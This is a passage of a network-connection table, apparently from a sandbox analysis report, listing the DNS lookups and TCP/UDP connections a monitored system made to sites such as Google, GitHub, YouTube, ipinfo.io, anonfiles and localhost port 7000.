| US | 8.8.8.8:53 | 238.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | precisionsec.com | udp |
| US | 162.241.218.190:443 | precisionsec.com | tcp |
| US | 162.241.218.190:443 | precisionsec.com | tcp |
| US | 8.8.8.8:53 | 190.218.241.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | tcp |
| US | 8.8.8.8:53 | precisionsec.activehosted.com | udp |
| US | 8.8.8.8:53 | trackcmp.net | udp |
| US | 8.8.8.8:53 | survey.survicate.com | udp |
| US | 104.17.206.31:443 | precisionsec.activehosted.com | tcp |
| US | 172.64.153.42:443 | trackcmp.net | tcp |
| GB | 143.244.38.136:443 | survey.survicate.com | tcp |
| US | 8.8.8.8:53 | 14.25.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | surveys-static.survicate.com | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| GB | 142.250.200.2:443 | googleads.g.doubleclick.net | tcp |
| US | 216.239.32.36:443 | region1.google-analytics.com | tcp |
| US | 8.8.8.8:53 | fonts.bunny.net | udp |
| GB | 143.244.38.136:443 | fonts.bunny.net | tcp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| GB | 143.244.38.136:443 | fonts.bunny.net | tcp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| GB | 216.58.204.67:443 | www.google.co.uk | tcp |
| BE | 64.233.167.157:443 | stats.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | diffuser-cdn.app-us1.com | udp |
| US | 104.17.31.174:443 | diffuser-cdn.app-us1.com | tcp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| GB | 143.244.38.136:443 | fonts.bunny.net | tcp |
| GB | 142.250.178.10:443 | content-autofill.googleapis.com | tcp |
| US | 8.8.8.8:53 | prism.app-us1.com | udp |
| US | 104.17.31.174:443 | prism.app-us1.com | tcp |
| US | 8.8.8.8:53 | 31.206.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.38.244.143.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.153.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.32.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.167.233.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 174.31.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.180.250.142.in-addr.arpa | udp |
| GB | 142.250.178.10:443 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 216.239.32.36:443 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.15.31.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.reddit.com | udp |
| US | 151.101.1.140:443 | www.reddit.com | tcp |
| US | 151.101.1.140:443 | www.reddit.com | tcp |
| US | 8.8.8.8:53 | w3-reporting-nel.reddit.com | udp |
| US | 151.101.1.140:443 | w3-reporting-nel.reddit.com | tcp |
| US | 151.101.1.140:443 | w3-reporting-nel.reddit.com | tcp |
| US | 8.8.8.8:53 | 140.1.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.201.86.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| GB | 142.250.200.3:443 | beacons.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | 3.200.250.142.in-addr.arpa | udp |
| GB | 142.250.200.3:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | malwaredomainlist.com | udp |
| US | 162.255.119.60:443 | malwaredomainlist.com | tcp |
| US | 162.255.119.60:443 | malwaredomainlist.com | tcp |
| US | 162.255.119.60:443 | malwaredomainlist.com | tcp |
| US | 162.255.119.60:80 | malwaredomainlist.com | tcp |
| US | 162.255.119.60:80 | malwaredomainlist.com | tcp |
| US | 8.8.8.8:53 | www.namecheap.com | udp |
| US | 104.16.100.56:443 | www.namecheap.com | tcp |
| US | 8.8.8.8:53 | static.nc-img.com | udp |
| US | 104.18.173.57:443 | static.nc-img.com | tcp |
| US | 8.8.8.8:53 | 60.119.255.162.in-addr.arpa | udp |
| US | 104.18.173.57:443 | static.nc-img.com | tcp |
| US | 104.18.173.57:443 | static.nc-img.com | tcp |
| US | 8.8.8.8:53 | 56.100.16.104.in-addr.arpa | udp |
| US | 104.18.173.57:443 | static.nc-img.com | tcp |
| US | 8.8.8.8:53 | d2d1m7iug7si0n.cloudfront.net | udp |
| GB | 3.162.19.210:443 | d2d1m7iug7si0n.cloudfront.net | tcp |
| GB | 3.162.19.210:443 | d2d1m7iug7si0n.cloudfront.net | tcp |
| GB | 3.162.19.210:443 | d2d1m7iug7si0n.cloudfront.net | tcp |
| US | 8.8.8.8:53 | cdn.engagement.ai | udp |
| GB | 13.224.81.16:443 | cdn.engagement.ai | tcp |
| US | 8.8.8.8:53 | script.crazyegg.com | udp |
| US | 8.8.8.8:53 | d.impactradius-event.com | udp |
| US | 35.186.249.72:443 | d.impactradius-event.com | tcp |
| US | 104.19.148.8:443 | script.crazyegg.com | tcp |
| US | 8.8.8.8:53 | chat.engagement.ai | udp |
| GB | 142.250.200.2:443 | googleads.g.doubleclick.net | udp |
| US | 172.64.154.76:443 | chat.engagement.ai | tcp |
| US | 8.8.8.8:53 | arbkwg0qq6.execute-api.us-east-2.amazonaws.com | udp |
| US | 18.116.151.235:443 | arbkwg0qq6.execute-api.us-east-2.amazonaws.com | tcp |
| US | 8.8.8.8:53 | domains-ws.revved.com | udp |
| GB | 3.162.20.96:443 | domains-ws.revved.com | tcp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | 57.173.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.19.162.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.81.224.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.249.186.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.148.19.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.154.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 235.151.116.18.in-addr.arpa | udp |
| GB | 142.250.200.42:443 | content-autofill.googleapis.com | udp |
| US | 104.19.148.8:443 | script.crazyegg.com | tcp |
| US | 8.8.8.8:53 | js-agent.newrelic.com | udp |
| US | 162.247.243.39:443 | js-agent.newrelic.com | tcp |
| US | 8.8.8.8:53 | static.thenounproject.com | udp |
| US | 8.8.8.8:53 | bam.nr-data.net | udp |
| GB | 3.162.20.11:443 | static.thenounproject.com | tcp |
| GB | 3.162.20.11:443 | static.thenounproject.com | tcp |
| GB | 3.162.20.11:443 | static.thenounproject.com | tcp |
| GB | 3.162.20.11:443 | static.thenounproject.com | tcp |
| GB | 3.162.20.11:443 | static.thenounproject.com | tcp |
| GB | 3.162.20.11:443 | static.thenounproject.com | tcp |
| US | 162.247.243.29:443 | bam.nr-data.net | tcp |
| US | 8.8.8.8:53 | pagestates-tracking.crazyegg.com | udp |
| US | 8.8.8.8:53 | assets-tracking.crazyegg.com | udp |
| GB | 3.162.20.56:443 | pagestates-tracking.crazyegg.com | tcp |
| GB | 3.162.20.112:443 | assets-tracking.crazyegg.com | tcp |
| US | 8.8.8.8:53 | d2bhsbhm5ibqfe.cloudfront.net | udp |
| US | 8.8.8.8:53 | tracking.crazyegg.com | udp |
| GB | 13.224.78.62:443 | d2bhsbhm5ibqfe.cloudfront.net | tcp |
| IE | 54.195.89.156:443 | tracking.crazyegg.com | tcp |
| US | 8.8.8.8:53 | cdn.cookielaw.org | udp |
| US | 104.19.178.52:443 | cdn.cookielaw.org | tcp |
| US | 8.8.8.8:53 | 96.20.162.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.20.162.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.247.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 39.243.247.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.20.162.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 112.20.162.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 156.89.195.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.78.224.13.in-addr.arpa | udp |
| US | 162.247.243.29:443 | bam.nr-data.net | tcp |
| US | 104.19.178.52:443 | cdn.cookielaw.org | tcp |
| US | 8.8.8.8:53 | geolocation.onetrust.com | udp |
| US | 8.8.8.8:53 | bat.bing.com | udp |
| US | 8.8.8.8:53 | static.ads-twitter.com | udp |
| US | 8.8.8.8:53 | a.quora.com | udp |
| US | 8.8.8.8:53 | connect.facebook.net | udp |
| US | 8.8.8.8:53 | www.redditstatic.com | udp |
| US | 8.8.8.8:53 | q.quora.com | udp |
| US | 104.18.32.137:443 | geolocation.onetrust.com | tcp |
| US | 204.79.197.237:443 | bat.bing.com | tcp |
| GB | 199.232.56.157:443 | static.ads-twitter.com | tcp |
| GB | 163.70.151.21:443 | connect.facebook.net | tcp |
| US | 151.101.1.140:443 | www.redditstatic.com | tcp |
| US | 162.159.152.17:443 | a.quora.com | tcp |
| US | 52.207.148.78:443 | q.quora.com | tcp |
| US | 8.8.8.8:53 | t.co | udp |
| US | 8.8.8.8:53 | analytics.twitter.com | udp |
| US | 151.101.1.140:443 | www.redditstatic.com | tcp |
| US | 8.8.8.8:53 | alb.reddit.com | udp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| GB | 216.58.204.67:443 | www.google.co.uk | udp |
| US | 104.244.42.67:443 | analytics.twitter.com | tcp |
| US | 104.244.42.69:443 | t.co | tcp |
| GB | 157.240.221.35:443 | www.facebook.com | tcp |
| US | 8.8.8.8:53 | 52.178.19.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.32.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.56.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.151.70.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.152.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.42.244.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.42.244.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.221.240.157.in-addr.arpa | udp |
| US | 216.239.32.36:443 | region1.google-analytics.com | udp |
| US | 162.247.243.29:443 | bam.nr-data.net | tcp |
| US | 162.247.243.29:443 | bam.nr-data.net | tcp |
| US | 162.247.243.29:443 | bam.nr-data.net | tcp |
| US | 162.247.243.29:443 | bam.nr-data.net | tcp |
| US | 8.8.8.8:53 | 34.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 206.217.137.210:80 | tcp | |
| US | 206.217.137.210:80 | tcp | |
| US | 206.217.137.210:80 | tcp | |
| GB | 142.250.187.206:443 | play.google.com | udp |
| US | 8.8.8.8:53 | id.google.com | udp |
| IN | 142.250.195.163:443 | id.google.com | tcp |
| GB | 142.250.200.3:443 | beacons.gcp.gvt2.com | udp |
| IN | 142.250.195.163:443 | id.google.com | tcp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| GB | 142.250.200.22:443 | i.ytimg.com | tcp |
| GB | 142.250.200.22:443 | i.ytimg.com | tcp |
| GB | 142.250.200.22:443 | i.ytimg.com | tcp |
| GB | 142.250.200.22:443 | i.ytimg.com | tcp |
| GB | 142.250.200.22:443 | i.ytimg.com | tcp |
| US | 8.8.8.8:53 | encrypted-tbn0.gstatic.com | udp |
| GB | 142.250.200.46:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 142.250.200.46:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 142.250.200.46:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 142.250.200.46:443 | encrypted-tbn0.gstatic.com | tcp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| GB | 142.250.200.22:443 | i.ytimg.com | udp |
| US | 8.8.8.8:53 | 22.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.195.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.200.250.142.in-addr.arpa | udp |
| GB | 142.250.200.2:443 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | static.doubleclick.net | udp |
| US | 8.8.8.8:53 | jnn-pa.googleapis.com | udp |
| GB | 142.250.180.6:443 | static.doubleclick.net | tcp |
| GB | 172.217.169.42:443 | jnn-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | 6.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rr5---sn-aigl6nsk.googlevideo.com | udp |
| GB | 74.125.105.106:443 | rr5---sn-aigl6nsk.googlevideo.com | tcp |
| GB | 74.125.105.106:443 | rr5---sn-aigl6nsk.googlevideo.com | tcp |
| US | 8.8.8.8:53 | 106.105.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rr4---sn-aigl6nsr.googlevideo.com | udp |
| GB | 74.125.105.137:443 | rr4---sn-aigl6nsr.googlevideo.com | tcp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| IE | 209.85.203.84:443 | accounts.google.com | udp |
| US | 8.8.8.8:53 | rr2---sn-q4fl6ndz.googlevideo.com | udp |
| US | 8.8.8.8:53 | i1.ytimg.com | udp |
| US | 173.194.141.135:443 | rr2---sn-q4fl6ndz.googlevideo.com | udp |
| GB | 142.250.200.46:443 | i1.ytimg.com | tcp |
| US | 8.8.8.8:53 | 137.105.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.203.85.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 135.141.194.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | yt3.ggpht.com | udp |
| GB | 142.250.178.1:443 | yt3.ggpht.com | tcp |
| US | 8.8.8.8:53 | 1.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rr1---sn-5hnekn7s.googlevideo.com | udp |
| NL | 74.125.100.38:443 | rr1---sn-5hnekn7s.googlevideo.com | udp |
| US | 8.8.8.8:53 | youtube.com | udp |
| GB | 216.58.204.78:443 | youtube.com | tcp |
| US | 8.8.8.8:53 | 38.100.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.204.58.216.in-addr.arpa | udp |
| GB | 142.250.178.1:443 | yt3.ggpht.com | udp |
| US | 8.8.8.8:53 | consent.youtube.com | udp |
| GB | 74.125.105.106:443 | rr5---sn-aigl6nsk.googlevideo.com | udp |
| GB | 74.125.105.137:443 | rr4---sn-aigl6nsr.googlevideo.com | udp |
| GB | 142.250.180.6:443 | static.doubleclick.net | udp |
| GB | 216.58.204.78:443 | youtube.com | udp |
| US | 8.8.8.8:53 | goo.su | udp |
| US | 104.21.38.221:443 | goo.su | tcp |
| US | 104.21.38.221:443 | goo.su | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 221.38.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.133:443 | avatars.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | user-images.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 140.82.113.22:443 | collector.github.com | tcp |
| US | 140.82.113.22:443 | collector.github.com | tcp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | 210.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.113.82.140.in-addr.arpa | udp |
| GB | 142.250.200.3:443 | beacons.gcp.gvt2.com | udp |
| GB | 142.250.187.206:443 | www.youtube.com | udp |
| US | 8.8.8.8:53 | google.com | udp |
| GB | 142.250.200.46:443 | google.com | tcp |
| US | 8.8.8.8:53 | e2c9.gcp.gvt2.com | udp |
| ID | 34.101.114.154:443 | e2c9.gcp.gvt2.com | tcp |
| ID | 34.101.114.154:443 | e2c9.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | 154.114.101.34.in-addr.arpa | udp |
| GB | 142.250.200.42:443 | jnn-pa.googleapis.com | udp |
| IE | 209.85.203.84:443 | accounts.google.com | udp |
| IE | 209.85.203.84:443 | accounts.google.com | tcp |
| US | 185.199.108.133:443 | user-images.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | e2c38.gcp.gvt2.com | udp |
| AU | 35.213.232.93:443 | e2c38.gcp.gvt2.com | tcp |
| AU | 35.213.232.93:443 | e2c38.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | 93.232.213.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beacons.gvt2.com | udp |
| GB | 172.217.169.35:443 | beacons.gvt2.com | tcp |
| US | 8.8.8.8:53 | 35.169.217.172.in-addr.arpa | udp |
| GB | 142.250.200.22:443 | i.ytimg.com | udp |
| US | 8.8.8.8:53 | rr2---sn-aigl6nz7.googlevideo.com | udp |
| GB | 74.125.168.103:443 | rr2---sn-aigl6nz7.googlevideo.com | udp |
| US | 8.8.8.8:53 | 103.168.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| GB | 142.250.200.2:443 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | google.com | udp |
| GB | 142.250.200.46:443 | google.com | udp |
| US | 8.8.8.8:53 | beacons3.gvt2.com | udp |
| GB | 172.217.169.67:443 | beacons3.gvt2.com | tcp |
| GB | 172.217.169.67:443 | beacons3.gvt2.com | udp |
| US | 8.8.8.8:53 | 67.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | sharetext.me | udp |
| US | 172.67.191.176:443 | sharetext.me | tcp |
| IE | 209.85.203.84:443 | accounts.google.com | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 8.8.8.8:53 | 176.191.67.172.in-addr.arpa | udp |
| US | 34.117.186.192:80 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | api.anonfiles.com | udp |
| US | 8.8.8.8:53 | 192.186.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beacons2.gvt2.com | udp |
| US | 8.8.8.8:53 | beacons4.gvt2.com | udp |
| QA | 34.124.82.3:443 | beacons2.gvt2.com | tcp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | tcp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | udp |
| GB | 142.250.200.46:443 | google.com | udp |
| US | 8.8.8.8:53 | 116.32.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.82.124.34.in-addr.arpa | udp |
| QA | 34.124.82.3:443 | beacons2.gvt2.com | udp |
| GB | 142.250.200.3:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| QA | 34.124.82.3:443 | beacons2.gvt2.com | udp |
| GB | 172.217.169.67:443 | beacons3.gvt2.com | udp |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| GB | 142.250.200.3:443 | beacons.gcp.gvt2.com | udp |
| US | 172.67.191.176:443 | sharetext.me | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:80 | ipinfo.io | tcp |
| N/A | 127.0.0.1:7000 | tcp | |
| US | 8.8.8.8:53 | api.anonfiles.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| GB | 142.250.178.4:443 | www.google.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 140.82.114.21:443 | collector.github.com | tcp |
| US | 8.8.8.8:53 | 21.114.82.140.in-addr.arpa | udp |
| N/A | 127.0.0.1:7000 | tcp | |
| IN | 142.250.195.163:443 | id.google.com | udp |
| IN | 142.250.195.163:443 | id.google.com | tcp |
| IN | 142.250.195.163:443 | id.google.com | tcp |
| US | 8.8.8.8:53 | learn.microsoft.com | udp |
| BE | 2.21.18.87:443 | learn.microsoft.com | tcp |
| BE | 2.21.18.87:443 | learn.microsoft.com | tcp |
| US | 8.8.8.8:53 | wcpstatic.microsoft.com | udp |
| US | 8.8.8.8:53 | js.monitor.azure.com | udp |
| US | 13.107.246.64:443 | js.monitor.azure.com | tcp |
| US | 13.107.246.64:443 | js.monitor.azure.com | tcp |
| US | 8.8.8.8:53 | 87.18.21.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | mscom.demdex.net | udp |
| IE | 52.49.42.218:443 | mscom.demdex.net | tcp |
| US | 8.8.8.8:53 | microsoftmscompoc.tt.omtrdc.net | udp |
| US | 8.8.8.8:53 | target.microsoft.com | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | 64.246.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 218.42.49.52.in-addr.arpa | udp |
| GB | 142.250.200.10:443 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | browser.events.data.microsoft.com | udp |
| US | 13.89.179.14:443 | browser.events.data.microsoft.com | tcp |
| US | 8.8.8.8:53 | 10.200.250.142.in-addr.arpa | udp |
| US | 13.89.179.14:443 | browser.events.data.microsoft.com | tcp |
| N/A | 127.0.0.1:7000 | tcp | |
| US | 8.8.8.8:53 | aka.ms | udp |
| GB | 2.17.6.114:443 | aka.ms | tcp |
| GB | 2.17.6.114:443 | aka.ms | tcp |
| US | 8.8.8.8:53 | download.visualstudio.microsoft.com | udp |
| FR | 68.232.34.200:443 | download.visualstudio.microsoft.com | tcp |
| US | 8.8.8.8:53 | 114.6.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.34.232.68.in-addr.arpa | udp |
| N/A | 127.0.0.1:7000 | tcp | |
| GB | 172.217.169.67:443 | beacons3.gvt2.com | udp |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| US | 8.8.8.8:53 | 159.113.53.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.223.142.52.in-addr.arpa | udp |
| GB | 142.250.200.3:443 | beacons.gcp.gvt2.com | udp |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| US | 8.8.8.8:53 | e2c42.gcp.gvt2.com | udp |
| DE | 35.207.191.46:443 | e2c42.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | 46.191.207.35.in-addr.arpa | udp |
| N/A | 127.0.0.1:7000 | tcp | |
| GB | 172.217.169.35:443 | beacons.gvt2.com | udp |
| N/A | 127.0.0.1:7000 | tcp | |
| US | 216.239.32.116:443 | beacons4.gvt2.com | udp |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| GB | 142.250.200.3:443 | beacons.gcp.gvt2.com | udp |
| N/A | 127.0.0.1:7000 | tcp | |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| GB | 142.250.200.10:443 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| GB | 172.217.16.238:443 | www.youtube.com | udp |
| GB | 172.217.16.238:443 | www.youtube.com | tcp |
| GB | 172.217.16.238:443 | www.youtube.com | tcp |
| N/A | 127.0.0.1:7000 | tcp | |
| QA | 34.124.82.3:443 | beacons2.gvt2.com | udp |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.178.4:443 | www.google.com | udp |
| US | 8.8.8.8:53 | id.google.com | udp |
| GB | 172.217.16.227:443 | id.google.com | udp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| US | 8.8.8.8:53 | 227.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | encrypted-tbn0.gstatic.com | udp |
| GB | 142.250.200.46:443 | encrypted-tbn0.gstatic.com | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | jnn-pa.googleapis.com | udp |
| GB | 142.250.200.2:443 | googleads.g.doubleclick.net | udp |
| GB | 142.250.200.22:443 | i.ytimg.com | udp |
| US | 8.8.8.8:53 | encrypted-vtbn0.gstatic.com | udp |
| GB | 142.250.200.10:443 | jnn-pa.googleapis.com | udp |
| GB | 142.250.178.14:443 | encrypted-vtbn0.gstatic.com | tcp |
| GB | 142.250.178.14:443 | encrypted-vtbn0.gstatic.com | tcp |
| GB | 142.250.200.2:443 | googleads.g.doubleclick.net | udp |
| GB | 142.250.178.14:443 | encrypted-vtbn0.gstatic.com | tcp |
| GB | 142.250.178.4:443 | www.google.com | udp |
| GB | 74.125.168.103:443 | rr2---sn-aigl6nz7.googlevideo.com | udp |
| GB | 142.250.178.4:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 14.178.250.142.in-addr.arpa | udp |
| N/A | 127.0.0.1:7000 | tcp | |
| US | 8.8.8.8:53 | lh5.googleusercontent.com | udp |
| GB | 216.58.201.97:443 | lh5.googleusercontent.com | udp |
| US | 8.8.8.8:53 | 97.201.58.216.in-addr.arpa | udp |
| N/A | 127.0.0.1:7000 | tcp | |
| US | 8.8.8.8:53 | ssl.gstatic.com | udp |
| GB | 142.250.180.3:443 | ssl.gstatic.com | tcp |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| GB | 142.250.200.46:443 | encrypted-tbn0.gstatic.com | udp |
| US | 8.8.8.8:53 | encrypted-tbn1.gstatic.com | udp |
| US | 8.8.8.8:53 | encrypted-tbn2.gstatic.com | udp |
| US | 8.8.8.8:53 | encrypted-tbn3.gstatic.com | udp |
| GB | 142.250.200.46:443 | encrypted-tbn3.gstatic.com | tcp |
| GB | 142.250.200.46:443 | encrypted-tbn3.gstatic.com | tcp |
| GB | 142.250.200.46:443 | encrypted-tbn3.gstatic.com | tcp |
| GB | 142.250.200.46:443 | encrypted-tbn3.gstatic.com | tcp |
| GB | 142.250.200.46:443 | encrypted-tbn3.gstatic.com | tcp |
| N/A | 127.0.0.1:7000 | tcp | |
| GB | 74.125.168.103:443 | rr2---sn-aigl6nz7.googlevideo.com | udp |
